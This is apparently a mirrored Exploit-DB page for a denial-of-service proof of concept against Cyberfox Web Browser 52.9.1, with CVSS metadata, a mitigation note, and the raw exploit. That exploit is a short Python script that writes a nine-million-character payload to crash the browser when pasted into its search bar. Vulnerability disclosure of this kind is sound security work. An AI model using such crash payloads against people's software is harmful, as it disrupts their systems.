Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)

vendor:

Cyberfox Web Browser

by:

Aryan Chehreghani

5.5

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: Cyberfox Web Browser

Affected Version From: Possibly all versions

Affected Version To: v52.9.1

Patch Exists: NO

Related CWE:

CPE: cyberfox-web-browser

Metasploit:

Other Scripts:

Platforms Tested: Windows

2021

Cyberfox Web Browser 52.9.1 – Denial of Service (PoC)

The exploit is a proof-of-concept for a Denial of Service vulnerability in Cyberfox Web Browser version 52.9.1. By running a Python script, it creates a large payload that causes the browser to crash when the content is copied and pasted into the search bar.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to avoid copying and pasting untrusted content into the Cyberfox Web Browser search bar.

Source

Exploit-DB raw data:

# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
# Date: 2021-09-26 
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cyberfox.8pecxstudios.com
# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html
# Version: v52.9.1 (Possibly all versions)
# Tested on: windows

#[ About - Cyberfox ] :
#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture 
#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages.

# [ Exploit/POC ] :
# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Cyberfox Web Browser
# 3.Copy the content of the file "output.txt" & Paste  into the "search bar"
# 4.Crashed 

Overflow = "\x41" * 9000000
try:
    f=open("output.txt","w")
    print("[!] Creating %s bytes DOS payload...." %len(Overflow))
    f.write(Overflow)
    f.close()
    print("[!] File Created !")
except:
    print("File cannot be created")